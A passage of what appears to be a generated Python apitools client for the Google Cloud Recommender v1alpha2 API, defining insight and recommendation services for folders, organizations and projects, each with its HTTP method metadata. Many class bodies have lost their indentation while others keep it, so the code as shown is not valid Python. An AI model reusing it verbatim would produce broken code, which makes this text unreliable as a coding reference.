    request_type_name='RecommenderFoldersLocationsInsightTypesInsightsMarkActiveRequest',
    response_type_name='GoogleCloudRecommenderV1alpha2Insight',
    supports_download=False,
)
def MarkDismissed(self, request, global_params=None):
    r"""Mark the Insight State as Dismissed.

    Use this to tell the Recommender API that an ACTIVE insight should be
    dismissed. Applicable to insights in ACTIVE state. Requires the
    recommender.*.update IAM permission for the specified insight type.

    Args:
      request: (RecommenderFoldersLocationsInsightTypesInsightsMarkDismissedRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (GoogleCloudRecommenderV1alpha2Insight) The response message.
    """
    method_config = self.GetMethodConfig('MarkDismissed')
    return self._RunMethod(method_config, request, global_params=global_params)

# HTTP wiring for MarkDismissed: POST to the insight's :markDismissed verb.
MarkDismissed.method_config = lambda: base_api.ApiMethodInfo(
    http_method='POST',
    method_id='recommender.folders.locations.insightTypes.insights.markDismissed',
    flat_path='v1alpha2/folders/{foldersId}/locations/{locationsId}/insightTypes/{insightTypesId}/insights/{insightsId}:markDismissed',
    relative_path='v1alpha2/{+name}:markDismissed',
    ordered_params=['name'],
    path_params=['name'],
    query_params=[],
    request_field='googleCloudRecommenderV1alpha2MarkInsightDismissedRequest',
    request_type_name='RecommenderFoldersLocationsInsightTypesInsightsMarkDismissedRequest',
    response_type_name='GoogleCloudRecommenderV1alpha2Insight',
    supports_download=False,
)
class FoldersLocationsInsightTypesService(base_api.BaseApiService):
    """Service class for the folders_locations_insightTypes resource."""

    _NAME = 'folders_locations_insightTypes'

    def __init__(self, client):
        super(RecommenderV1alpha2.FoldersLocationsInsightTypesService, self).__init__(client)
        # This resource exposes no media-upload methods.
        self._upload_configs = {}
class FoldersLocationsRecommendersRecommendationsService(base_api.BaseApiService):
"""Service class for the folders_locations_recommenders_recommendations resource."""
# Generated service binding: each public method below looks up its
# ApiMethodInfo via GetMethodConfig and delegates the HTTP call to
# base_api.BaseApiService._RunMethod.
_NAME = 'folders_locations_recommenders_recommendations'
def __init__(self, client):
super(RecommenderV1alpha2.FoldersLocationsRecommendersRecommendationsService, self).__init__(client)
# No methods on this resource support media upload.
self._upload_configs = {
}
def Get(self, request, global_params=None):
r"""Gets the requested recommendation. Requires the recommender.*.get IAM permission for the specified recommender.
Args:
request: (RecommenderFoldersLocationsRecommendersRecommendationsGetRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(GoogleCloudRecommenderV1alpha2Recommendation) The response message.
"""
config = self.GetMethodConfig('Get')
return self._RunMethod(
config, request, global_params=global_params)
# HTTP wiring for Get: GET on v1alpha2/{+name}, no body, no query params.
Get.method_config = lambda: base_api.ApiMethodInfo(
flat_path='v1alpha2/folders/{foldersId}/locations/{locationsId}/recommenders/{recommendersId}/recommendations/{recommendationsId}',
http_method='GET',
method_id='recommender.folders.locations.recommenders.recommendations.get',
ordered_params=['name'],
path_params=['name'],
query_params=[],
relative_path='v1alpha2/{+name}',
request_field='',
request_type_name='RecommenderFoldersLocationsRecommendersRecommendationsGetRequest',
response_type_name='GoogleCloudRecommenderV1alpha2Recommendation',
supports_download=False,
)
def List(self, request, global_params=None):
r"""Lists recommendations for the specified Cloud Resource. Requires the recommender.*.list IAM permission for the specified recommender.
Args:
request: (RecommenderFoldersLocationsRecommendersRecommendationsListRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(GoogleCloudRecommenderV1alpha2ListRecommendationsResponse) The response message.
"""
config = self.GetMethodConfig('List')
return self._RunMethod(
config, request, global_params=global_params)
# HTTP wiring for List: GET on the parent's /recommendations collection,
# paginated via filter/pageSize/pageToken query params.
List.method_config = lambda: base_api.ApiMethodInfo(
flat_path='v1alpha2/folders/{foldersId}/locations/{locationsId}/recommenders/{recommendersId}/recommendations',
http_method='GET',
method_id='recommender.folders.locations.recommenders.recommendations.list',
ordered_params=['parent'],
path_params=['parent'],
query_params=['filter', 'pageSize', 'pageToken'],
relative_path='v1alpha2/{+parent}/recommendations',
request_field='',
request_type_name='RecommenderFoldersLocationsRecommendersRecommendationsListRequest',
response_type_name='GoogleCloudRecommenderV1alpha2ListRecommendationsResponse',
supports_download=False,
)
def MarkActive(self, request, global_params=None):
r"""Mark the Recommendation State as Active. Users can use this method to indicate to the Recommender API that a DISMISSED recommendation has to be marked back as ACTIVE. MarkRecommendationActive can be applied to recommendations in DISMISSED state. Requires the recommender.*.update IAM permission for the specified recommender.
Args:
request: (RecommenderFoldersLocationsRecommendersRecommendationsMarkActiveRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(GoogleCloudRecommenderV1alpha2Recommendation) The response message.
"""
config = self.GetMethodConfig('MarkActive')
return self._RunMethod(
config, request, global_params=global_params)
# HTTP wiring for MarkActive: POST to the recommendation's :markActive verb.
MarkActive.method_config = lambda: base_api.ApiMethodInfo(
flat_path='v1alpha2/folders/{foldersId}/locations/{locationsId}/recommenders/{recommendersId}/recommendations/{recommendationsId}:markActive',
http_method='POST',
method_id='recommender.folders.locations.recommenders.recommendations.markActive',
ordered_params=['name'],
path_params=['name'],
query_params=[],
relative_path='v1alpha2/{+name}:markActive',
request_field='googleCloudRecommenderV1alpha2MarkRecommendationActiveRequest',
request_type_name='RecommenderFoldersLocationsRecommendersRecommendationsMarkActiveRequest',
response_type_name='GoogleCloudRecommenderV1alpha2Recommendation',
supports_download=False,
)
def MarkClaimed(self, request, global_params=None):
r"""Marks the Recommendation State as Claimed. Users can use this method to indicate to the Recommender API that they are starting to apply the recommendation themselves. This stops the recommendation content from being updated. Associated insights are frozen and placed in the ACCEPTED state. MarkRecommendationClaimed can be applied to recommendations in CLAIMED or ACTIVE state. Requires the recommender.*.update IAM permission for the specified recommender.
Args:
request: (RecommenderFoldersLocationsRecommendersRecommendationsMarkClaimedRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(GoogleCloudRecommenderV1alpha2Recommendation) The response message.
"""
config = self.GetMethodConfig('MarkClaimed')
return self._RunMethod(
config, request, global_params=global_params)
# HTTP wiring for MarkClaimed: POST to the recommendation's :markClaimed verb.
MarkClaimed.method_config = lambda: base_api.ApiMethodInfo(
flat_path='v1alpha2/folders/{foldersId}/locations/{locationsId}/recommenders/{recommendersId}/recommendations/{recommendationsId}:markClaimed',
http_method='POST',
method_id='recommender.folders.locations.recommenders.recommendations.markClaimed',
ordered_params=['name'],
path_params=['name'],
query_params=[],
relative_path='v1alpha2/{+name}:markClaimed',
request_field='googleCloudRecommenderV1alpha2MarkRecommendationClaimedRequest',
request_type_name='RecommenderFoldersLocationsRecommendersRecommendationsMarkClaimedRequest',
response_type_name='GoogleCloudRecommenderV1alpha2Recommendation',
supports_download=False,
)
def MarkDismissed(self, request, global_params=None):
r"""Mark the Recommendation State as Dismissed. Users can use this method to indicate to the Recommender API that an ACTIVE recommendation has to be marked back as DISMISSED. MarkRecommendationDismissed can be applied to recommendations in ACTIVE state. Requires the recommender.*.update IAM permission for the specified recommender.
Args:
request: (RecommenderFoldersLocationsRecommendersRecommendationsMarkDismissedRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(GoogleCloudRecommenderV1alpha2Recommendation) The response message.
"""
config = self.GetMethodConfig('MarkDismissed')
return self._RunMethod(
config, request, global_params=global_params)
# HTTP wiring for MarkDismissed: POST to the recommendation's :markDismissed verb.
MarkDismissed.method_config = lambda: base_api.ApiMethodInfo(
flat_path='v1alpha2/folders/{foldersId}/locations/{locationsId}/recommenders/{recommendersId}/recommendations/{recommendationsId}:markDismissed',
http_method='POST',
method_id='recommender.folders.locations.recommenders.recommendations.markDismissed',
ordered_params=['name'],
path_params=['name'],
query_params=[],
relative_path='v1alpha2/{+name}:markDismissed',
request_field='googleCloudRecommenderV1alpha2MarkRecommendationDismissedRequest',
request_type_name='RecommenderFoldersLocationsRecommendersRecommendationsMarkDismissedRequest',
response_type_name='GoogleCloudRecommenderV1alpha2Recommendation',
supports_download=False,
)
def MarkFailed(self, request, global_params=None):
r"""Marks the Recommendation State as Failed. Users can use this method to indicate to the Recommender API that they have applied the recommendation themselves, and the operation failed. This stops the recommendation content from being updated. Associated insights are frozen and placed in the ACCEPTED state. MarkRecommendationFailed can be applied to recommendations in ACTIVE, CLAIMED, SUCCEEDED, or FAILED state. Requires the recommender.*.update IAM permission for the specified recommender.
Args:
request: (RecommenderFoldersLocationsRecommendersRecommendationsMarkFailedRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(GoogleCloudRecommenderV1alpha2Recommendation) The response message.
"""
config = self.GetMethodConfig('MarkFailed')
return self._RunMethod(
config, request, global_params=global_params)
# HTTP wiring for MarkFailed: POST to the recommendation's :markFailed verb.
MarkFailed.method_config = lambda: base_api.ApiMethodInfo(
flat_path='v1alpha2/folders/{foldersId}/locations/{locationsId}/recommenders/{recommendersId}/recommendations/{recommendationsId}:markFailed',
http_method='POST',
method_id='recommender.folders.locations.recommenders.recommendations.markFailed',
ordered_params=['name'],
path_params=['name'],
query_params=[],
relative_path='v1alpha2/{+name}:markFailed',
request_field='googleCloudRecommenderV1alpha2MarkRecommendationFailedRequest',
request_type_name='RecommenderFoldersLocationsRecommendersRecommendationsMarkFailedRequest',
response_type_name='GoogleCloudRecommenderV1alpha2Recommendation',
supports_download=False,
)
def MarkSucceeded(self, request, global_params=None):
r"""Marks the Recommendation State as Succeeded. Users can use this method to indicate to the Recommender API that they have applied the recommendation themselves, and the operation was successful. This stops the recommendation content from being updated. Associated insights are frozen and placed in the ACCEPTED state. MarkRecommendationSucceeded can be applied to recommendations in ACTIVE, CLAIMED, SUCCEEDED, or FAILED state. Requires the recommender.*.update IAM permission for the specified recommender.
Args:
request: (RecommenderFoldersLocationsRecommendersRecommendationsMarkSucceededRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(GoogleCloudRecommenderV1alpha2Recommendation) The response message.
"""
config = self.GetMethodConfig('MarkSucceeded')
return self._RunMethod(
config, request, global_params=global_params)
# HTTP wiring for MarkSucceeded: POST to the recommendation's :markSucceeded verb.
MarkSucceeded.method_config = lambda: base_api.ApiMethodInfo(
flat_path='v1alpha2/folders/{foldersId}/locations/{locationsId}/recommenders/{recommendersId}/recommendations/{recommendationsId}:markSucceeded',
http_method='POST',
method_id='recommender.folders.locations.recommenders.recommendations.markSucceeded',
ordered_params=['name'],
path_params=['name'],
query_params=[],
relative_path='v1alpha2/{+name}:markSucceeded',
request_field='googleCloudRecommenderV1alpha2MarkRecommendationSucceededRequest',
request_type_name='RecommenderFoldersLocationsRecommendersRecommendationsMarkSucceededRequest',
response_type_name='GoogleCloudRecommenderV1alpha2Recommendation',
supports_download=False,
)
class FoldersLocationsRecommendersService(base_api.BaseApiService):
    """Service class for the folders_locations_recommenders resource."""

    _NAME = 'folders_locations_recommenders'

    def __init__(self, client):
        super(RecommenderV1alpha2.FoldersLocationsRecommendersService, self).__init__(client)
        # This resource exposes no media-upload methods.
        self._upload_configs = {}
class FoldersLocationsService(base_api.BaseApiService):
    """Service class for the folders_locations resource."""

    _NAME = 'folders_locations'

    def __init__(self, client):
        super(RecommenderV1alpha2.FoldersLocationsService, self).__init__(client)
        # This resource exposes no media-upload methods.
        self._upload_configs = {}
class FoldersService(base_api.BaseApiService):
    """Service class for the folders resource."""

    _NAME = 'folders'

    def __init__(self, client):
        super(RecommenderV1alpha2.FoldersService, self).__init__(client)
        # This resource exposes no media-upload methods.
        self._upload_configs = {}
class OrganizationsLocationsInsightTypesInsightsService(base_api.BaseApiService):
"""Service class for the organizations_locations_insightTypes_insights resource."""
# Generated service binding: each public method below looks up its
# ApiMethodInfo via GetMethodConfig and delegates the HTTP call to
# base_api.BaseApiService._RunMethod.
_NAME = 'organizations_locations_insightTypes_insights'
def __init__(self, client):
super(RecommenderV1alpha2.OrganizationsLocationsInsightTypesInsightsService, self).__init__(client)
# No methods on this resource support media upload.
self._upload_configs = {
}
def Get(self, request, global_params=None):
r"""Gets the requested insight. Requires the recommender.*.get IAM permission for the specified insight type.
Args:
request: (RecommenderOrganizationsLocationsInsightTypesInsightsGetRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(GoogleCloudRecommenderV1alpha2Insight) The response message.
"""
config = self.GetMethodConfig('Get')
return self._RunMethod(
config, request, global_params=global_params)
# HTTP wiring for Get: GET on v1alpha2/{+name}, no body, no query params.
Get.method_config = lambda: base_api.ApiMethodInfo(
flat_path='v1alpha2/organizations/{organizationsId}/locations/{locationsId}/insightTypes/{insightTypesId}/insights/{insightsId}',
http_method='GET',
method_id='recommender.organizations.locations.insightTypes.insights.get',
ordered_params=['name'],
path_params=['name'],
query_params=[],
relative_path='v1alpha2/{+name}',
request_field='',
request_type_name='RecommenderOrganizationsLocationsInsightTypesInsightsGetRequest',
response_type_name='GoogleCloudRecommenderV1alpha2Insight',
supports_download=False,
)
def List(self, request, global_params=None):
r"""Lists insights for the specified Cloud Resource. Requires the recommender.*.list IAM permission for the specified insight type.
Args:
request: (RecommenderOrganizationsLocationsInsightTypesInsightsListRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(GoogleCloudRecommenderV1alpha2ListInsightsResponse) The response message.
"""
config = self.GetMethodConfig('List')
return self._RunMethod(
config, request, global_params=global_params)
# HTTP wiring for List: GET on the parent's /insights collection,
# paginated via filter/pageSize/pageToken query params.
List.method_config = lambda: base_api.ApiMethodInfo(
flat_path='v1alpha2/organizations/{organizationsId}/locations/{locationsId}/insightTypes/{insightTypesId}/insights',
http_method='GET',
method_id='recommender.organizations.locations.insightTypes.insights.list',
ordered_params=['parent'],
path_params=['parent'],
query_params=['filter', 'pageSize', 'pageToken'],
relative_path='v1alpha2/{+parent}/insights',
request_field='',
request_type_name='RecommenderOrganizationsLocationsInsightTypesInsightsListRequest',
response_type_name='GoogleCloudRecommenderV1alpha2ListInsightsResponse',
supports_download=False,
)
def MarkAccepted(self, request, global_params=None):
r"""Marks the Insight State as Accepted. Users can use this method to indicate to the Recommender API that they have applied some action based on the insight. This stops the insight content from being updated. MarkInsightAccepted can be applied to insights in ACTIVE state. Requires the recommender.*.update IAM permission for the specified insight.
Args:
request: (RecommenderOrganizationsLocationsInsightTypesInsightsMarkAcceptedRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(GoogleCloudRecommenderV1alpha2Insight) The response message.
"""
config = self.GetMethodConfig('MarkAccepted')
return self._RunMethod(
config, request, global_params=global_params)
# HTTP wiring for MarkAccepted: POST to the insight's :markAccepted verb.
MarkAccepted.method_config = lambda: base_api.ApiMethodInfo(
flat_path='v1alpha2/organizations/{organizationsId}/locations/{locationsId}/insightTypes/{insightTypesId}/insights/{insightsId}:markAccepted',
http_method='POST',
method_id='recommender.organizations.locations.insightTypes.insights.markAccepted',
ordered_params=['name'],
path_params=['name'],
query_params=[],
relative_path='v1alpha2/{+name}:markAccepted',
request_field='googleCloudRecommenderV1alpha2MarkInsightAcceptedRequest',
request_type_name='RecommenderOrganizationsLocationsInsightTypesInsightsMarkAcceptedRequest',
response_type_name='GoogleCloudRecommenderV1alpha2Insight',
supports_download=False,
)
def MarkActive(self, request, global_params=None):
r"""Mark the Insight State as Active. Users can use this method to indicate to the Recommender API that a DISMISSED insight has to be marked back as ACTIVE. MarkInsightActive can be applied to insights in DISMISSED state. Requires the recommender.*.update IAM permission for the specified insight type.
Args:
request: (RecommenderOrganizationsLocationsInsightTypesInsightsMarkActiveRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(GoogleCloudRecommenderV1alpha2Insight) The response message.
"""
config = self.GetMethodConfig('MarkActive')
return self._RunMethod(
config, request, global_params=global_params)
# HTTP wiring for MarkActive: POST to the insight's :markActive verb.
MarkActive.method_config = lambda: base_api.ApiMethodInfo(
flat_path='v1alpha2/organizations/{organizationsId}/locations/{locationsId}/insightTypes/{insightTypesId}/insights/{insightsId}:markActive',
http_method='POST',
method_id='recommender.organizations.locations.insightTypes.insights.markActive',
ordered_params=['name'],
path_params=['name'],
query_params=[],
relative_path='v1alpha2/{+name}:markActive',
request_field='googleCloudRecommenderV1alpha2MarkInsightActiveRequest',
request_type_name='RecommenderOrganizationsLocationsInsightTypesInsightsMarkActiveRequest',
response_type_name='GoogleCloudRecommenderV1alpha2Insight',
supports_download=False,
)
def MarkDismissed(self, request, global_params=None):
r"""Mark the Insight State as Dismissed. Users can use this method to indicate to the Recommender API that an ACTIVE insight should be dismissed. MarkInsightDismissed can be applied to insights in ACTIVE state. Requires the recommender.*.update IAM permission for the specified insight type.
Args:
request: (RecommenderOrganizationsLocationsInsightTypesInsightsMarkDismissedRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(GoogleCloudRecommenderV1alpha2Insight) The response message.
"""
config = self.GetMethodConfig('MarkDismissed')
return self._RunMethod(
config, request, global_params=global_params)
# HTTP wiring for MarkDismissed: POST to the insight's :markDismissed verb.
MarkDismissed.method_config = lambda: base_api.ApiMethodInfo(
flat_path='v1alpha2/organizations/{organizationsId}/locations/{locationsId}/insightTypes/{insightTypesId}/insights/{insightsId}:markDismissed',
http_method='POST',
method_id='recommender.organizations.locations.insightTypes.insights.markDismissed',
ordered_params=['name'],
path_params=['name'],
query_params=[],
relative_path='v1alpha2/{+name}:markDismissed',
request_field='googleCloudRecommenderV1alpha2MarkInsightDismissedRequest',
request_type_name='RecommenderOrganizationsLocationsInsightTypesInsightsMarkDismissedRequest',
response_type_name='GoogleCloudRecommenderV1alpha2Insight',
supports_download=False,
)
class OrganizationsLocationsInsightTypesService(base_api.BaseApiService):
    """Service class for the organizations_locations_insightTypes resource."""

    _NAME = 'organizations_locations_insightTypes'

    def __init__(self, client):
        super(RecommenderV1alpha2.OrganizationsLocationsInsightTypesService, self).__init__(client)
        # This resource exposes no media-upload methods.
        self._upload_configs = {}
class OrganizationsLocationsRecommendersRecommendationsService(base_api.BaseApiService):
"""Service class for the organizations_locations_recommenders_recommendations resource."""
# Generated service binding: each public method below looks up its
# ApiMethodInfo via GetMethodConfig and delegates the HTTP call to
# base_api.BaseApiService._RunMethod.
_NAME = 'organizations_locations_recommenders_recommendations'
def __init__(self, client):
super(RecommenderV1alpha2.OrganizationsLocationsRecommendersRecommendationsService, self).__init__(client)
# No methods on this resource support media upload.
self._upload_configs = {
}
def Get(self, request, global_params=None):
r"""Gets the requested recommendation. Requires the recommender.*.get IAM permission for the specified recommender.
Args:
request: (RecommenderOrganizationsLocationsRecommendersRecommendationsGetRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(GoogleCloudRecommenderV1alpha2Recommendation) The response message.
"""
config = self.GetMethodConfig('Get')
return self._RunMethod(
config, request, global_params=global_params)
# HTTP wiring for Get: GET on v1alpha2/{+name}, no body, no query params.
Get.method_config = lambda: base_api.ApiMethodInfo(
flat_path='v1alpha2/organizations/{organizationsId}/locations/{locationsId}/recommenders/{recommendersId}/recommendations/{recommendationsId}',
http_method='GET',
method_id='recommender.organizations.locations.recommenders.recommendations.get',
ordered_params=['name'],
path_params=['name'],
query_params=[],
relative_path='v1alpha2/{+name}',
request_field='',
request_type_name='RecommenderOrganizationsLocationsRecommendersRecommendationsGetRequest',
response_type_name='GoogleCloudRecommenderV1alpha2Recommendation',
supports_download=False,
)
def List(self, request, global_params=None):
r"""Lists recommendations for the specified Cloud Resource. Requires the recommender.*.list IAM permission for the specified recommender.
Args:
request: (RecommenderOrganizationsLocationsRecommendersRecommendationsListRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(GoogleCloudRecommenderV1alpha2ListRecommendationsResponse) The response message.
"""
config = self.GetMethodConfig('List')
return self._RunMethod(
config, request, global_params=global_params)
# HTTP wiring for List: GET on the parent's /recommendations collection,
# paginated via filter/pageSize/pageToken query params.
List.method_config = lambda: base_api.ApiMethodInfo(
flat_path='v1alpha2/organizations/{organizationsId}/locations/{locationsId}/recommenders/{recommendersId}/recommendations',
http_method='GET',
method_id='recommender.organizations.locations.recommenders.recommendations.list',
ordered_params=['parent'],
path_params=['parent'],
query_params=['filter', 'pageSize', 'pageToken'],
relative_path='v1alpha2/{+parent}/recommendations',
request_field='',
request_type_name='RecommenderOrganizationsLocationsRecommendersRecommendationsListRequest',
response_type_name='GoogleCloudRecommenderV1alpha2ListRecommendationsResponse',
supports_download=False,
)
def MarkActive(self, request, global_params=None):
r"""Mark the Recommendation State as Active. Users can use this method to indicate to the Recommender API that a DISMISSED recommendation has to be marked back as ACTIVE. MarkRecommendationActive can be applied to recommendations in DISMISSED state. Requires the recommender.*.update IAM permission for the specified recommender.
Args:
request: (RecommenderOrganizationsLocationsRecommendersRecommendationsMarkActiveRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(GoogleCloudRecommenderV1alpha2Recommendation) The response message.
"""
config = self.GetMethodConfig('MarkActive')
return self._RunMethod(
config, request, global_params=global_params)
# HTTP wiring for MarkActive: POST to the recommendation's :markActive verb.
MarkActive.method_config = lambda: base_api.ApiMethodInfo(
flat_path='v1alpha2/organizations/{organizationsId}/locations/{locationsId}/recommenders/{recommendersId}/recommendations/{recommendationsId}:markActive',
http_method='POST',
method_id='recommender.organizations.locations.recommenders.recommendations.markActive',
ordered_params=['name'],
path_params=['name'],
query_params=[],
relative_path='v1alpha2/{+name}:markActive',
request_field='googleCloudRecommenderV1alpha2MarkRecommendationActiveRequest',
request_type_name='RecommenderOrganizationsLocationsRecommendersRecommendationsMarkActiveRequest',
response_type_name='GoogleCloudRecommenderV1alpha2Recommendation',
supports_download=False,
)
def MarkClaimed(self, request, global_params=None):
r"""Marks the Recommendation State as Claimed. Users can use this method to indicate to the Recommender API that they are starting to apply the recommendation themselves. This stops the recommendation content from being updated. Associated insights are frozen and placed in the ACCEPTED state. MarkRecommendationClaimed can be applied to recommendations in CLAIMED or ACTIVE state. Requires the recommender.*.update IAM permission for the specified recommender.
Args:
request: (RecommenderOrganizationsLocationsRecommendersRecommendationsMarkClaimedRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(GoogleCloudRecommenderV1alpha2Recommendation) The response message.
"""
config = self.GetMethodConfig('MarkClaimed')
return self._RunMethod(
config, request, global_params=global_params)
# HTTP wiring for MarkClaimed: POST to the recommendation's :markClaimed verb.
MarkClaimed.method_config = lambda: base_api.ApiMethodInfo(
flat_path='v1alpha2/organizations/{organizationsId}/locations/{locationsId}/recommenders/{recommendersId}/recommendations/{recommendationsId}:markClaimed',
http_method='POST',
method_id='recommender.organizations.locations.recommenders.recommendations.markClaimed',
ordered_params=['name'],
path_params=['name'],
query_params=[],
relative_path='v1alpha2/{+name}:markClaimed',
request_field='googleCloudRecommenderV1alpha2MarkRecommendationClaimedRequest',
request_type_name='RecommenderOrganizationsLocationsRecommendersRecommendationsMarkClaimedRequest',
response_type_name='GoogleCloudRecommenderV1alpha2Recommendation',
supports_download=False,
)
def MarkDismissed(self, request, global_params=None):
r"""Mark the Recommendation State as Dismissed. Users can use this method to indicate to the Recommender API that an ACTIVE recommendation has to be marked back as DISMISSED. MarkRecommendationDismissed can be applied to recommendations in ACTIVE state. Requires the recommender.*.update IAM permission for the specified recommender.
Args:
request: (RecommenderOrganizationsLocationsRecommendersRecommendationsMarkDismissedRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(GoogleCloudRecommenderV1alpha2Recommendation) The response message.
"""
config = self.GetMethodConfig('MarkDismissed')
return self._RunMethod(
config, request, global_params=global_params)
# HTTP wiring for MarkDismissed: POST to the recommendation's :markDismissed verb.
MarkDismissed.method_config = lambda: base_api.ApiMethodInfo(
flat_path='v1alpha2/organizations/{organizationsId}/locations/{locationsId}/recommenders/{recommendersId}/recommendations/{recommendationsId}:markDismissed',
http_method='POST',
method_id='recommender.organizations.locations.recommenders.recommendations.markDismissed',
ordered_params=['name'],
path_params=['name'],
query_params=[],
relative_path='v1alpha2/{+name}:markDismissed',
request_field='googleCloudRecommenderV1alpha2MarkRecommendationDismissedRequest',
request_type_name='RecommenderOrganizationsLocationsRecommendersRecommendationsMarkDismissedRequest',
response_type_name='GoogleCloudRecommenderV1alpha2Recommendation',
supports_download=False,
)
def MarkFailed(self, request, global_params=None):
r"""Marks the Recommendation State as Failed. Users can use this method to indicate to the Recommender API that they have applied the recommendation themselves, and the operation failed. This stops the recommendation content from being updated. Associated insights are frozen and placed in the ACCEPTED state. MarkRecommendationFailed can be applied to recommendations in ACTIVE, CLAIMED, SUCCEEDED, or FAILED state. Requires the recommender.*.update IAM permission for the specified recommender.
Args:
request: (RecommenderOrganizationsLocationsRecommendersRecommendationsMarkFailedRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(GoogleCloudRecommenderV1alpha2Recommendation) The response message.
"""
config = self.GetMethodConfig('MarkFailed')
return self._RunMethod(
config, request, global_params=global_params)
# HTTP wiring for MarkFailed: POST to the recommendation's :markFailed verb.
MarkFailed.method_config = lambda: base_api.ApiMethodInfo(
flat_path='v1alpha2/organizations/{organizationsId}/locations/{locationsId}/recommenders/{recommendersId}/recommendations/{recommendationsId}:markFailed',
http_method='POST',
method_id='recommender.organizations.locations.recommenders.recommendations.markFailed',
ordered_params=['name'],
path_params=['name'],
query_params=[],
relative_path='v1alpha2/{+name}:markFailed',
request_field='googleCloudRecommenderV1alpha2MarkRecommendationFailedRequest',
request_type_name='RecommenderOrganizationsLocationsRecommendersRecommendationsMarkFailedRequest',
response_type_name='GoogleCloudRecommenderV1alpha2Recommendation',
supports_download=False,
)
def MarkSucceeded(self, request, global_params=None):
r"""Marks the Recommendation State as Succeeded. Users can use this method to indicate to the Recommender API that they have applied the recommendation themselves, and the operation was successful. This stops the recommendation content from being updated. Associated insights are frozen and placed in the ACCEPTED state. MarkRecommendationSucceeded can be applied to recommendations in ACTIVE, CLAIMED, SUCCEEDED, or FAILED state. Requires the recommender.*.update IAM permission for the specified recommender.
Args:
request: (RecommenderOrganizationsLocationsRecommendersRecommendationsMarkSucceededRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(GoogleCloudRecommenderV1alpha2Recommendation) The response message.
"""
config = self.GetMethodConfig('MarkSucceeded')
return self._RunMethod(
config, request, global_params=global_params)
# HTTP wiring for MarkSucceeded: POST to the recommendation's :markSucceeded verb.
MarkSucceeded.method_config = lambda: base_api.ApiMethodInfo(
flat_path='v1alpha2/organizations/{organizationsId}/locations/{locationsId}/recommenders/{recommendersId}/recommendations/{recommendationsId}:markSucceeded',
http_method='POST',
method_id='recommender.organizations.locations.recommenders.recommendations.markSucceeded',
ordered_params=['name'],
path_params=['name'],
query_params=[],
relative_path='v1alpha2/{+name}:markSucceeded',
request_field='googleCloudRecommenderV1alpha2MarkRecommendationSucceededRequest',
request_type_name='RecommenderOrganizationsLocationsRecommendersRecommendationsMarkSucceededRequest',
response_type_name='GoogleCloudRecommenderV1alpha2Recommendation',
supports_download=False,
)
class OrganizationsLocationsRecommendersService(base_api.BaseApiService):
    """Service class for the organizations_locations_recommenders resource."""

    # Resource collection name used by the apitools client to register this service.
    _NAME = 'organizations_locations_recommenders'

    def __init__(self, client):
        super(RecommenderV1alpha2.OrganizationsLocationsRecommendersService, self).__init__(client)
        # No resumable-upload configurations exist for this service.
        self._upload_configs = {
            }

    def GetConfig(self, request, global_params=None):
        r"""Gets the requested Recommender Config. There is only one instance of the config for each Recommender.

        Args:
          request: (RecommenderOrganizationsLocationsRecommendersGetConfigRequest) input message
          global_params: (StandardQueryParameters, default: None) global arguments
        Returns:
          (GoogleCloudRecommenderV1alpha2RecommenderConfig) The response message.
        """
        config = self.GetMethodConfig('GetConfig')
        return self._RunMethod(
            config, request, global_params=global_params)

    # Declarative endpoint metadata consumed by the apitools base client;
    # request_field='' means the request message carries no HTTP body.
    GetConfig.method_config = lambda: base_api.ApiMethodInfo(
        flat_path='v1alpha2/organizations/{organizationsId}/locations/{locationsId}/recommenders/{recommendersId}/config',
        http_method='GET',
        method_id='recommender.organizations.locations.recommenders.getConfig',
        ordered_params=['name'],
        path_params=['name'],
        query_params=[],
        relative_path='v1alpha2/{+name}',
        request_field='',
        request_type_name='RecommenderOrganizationsLocationsRecommendersGetConfigRequest',
        response_type_name='GoogleCloudRecommenderV1alpha2RecommenderConfig',
        supports_download=False,
    )
class OrganizationsLocationsService(base_api.BaseApiService):
    """Service class for the organizations_locations resource."""

    # Resource collection name used by the apitools client to register this service.
    _NAME = 'organizations_locations'

    def __init__(self, client):
        super(RecommenderV1alpha2.OrganizationsLocationsService, self).__init__(client)
        # Placeholder container for this (method-less) intermediate resource.
        self._upload_configs = {
            }
class OrganizationsService(base_api.BaseApiService):
    """Service class for the organizations resource."""

    # Resource collection name used by the apitools client to register this service.
    _NAME = 'organizations'

    def __init__(self, client):
        super(RecommenderV1alpha2.OrganizationsService, self).__init__(client)
        # Placeholder container for this (method-less) intermediate resource.
        self._upload_configs = {
            }
class ProjectsLocationsInsightTypesInsightsService(base_api.BaseApiService):
    """Service class for the projects_locations_insightTypes_insights resource."""

    # Resource collection name used by the apitools client to register this service.
    _NAME = 'projects_locations_insightTypes_insights'

    def __init__(self, client):
        super(RecommenderV1alpha2.ProjectsLocationsInsightTypesInsightsService, self).__init__(client)
        # No resumable-upload configurations exist for this service.
        self._upload_configs = {
            }

    def Get(self, request, global_params=None):
        r"""Gets the requested insight. Requires the recommender.*.get IAM permission for the specified insight type.

        Args:
          request: (RecommenderProjectsLocationsInsightTypesInsightsGetRequest) input message
          global_params: (StandardQueryParameters, default: None) global arguments
        Returns:
          (GoogleCloudRecommenderV1alpha2Insight) The response message.
        """
        config = self.GetMethodConfig('Get')
        return self._RunMethod(
            config, request, global_params=global_params)

    # Declarative endpoint metadata consumed by the apitools base client.
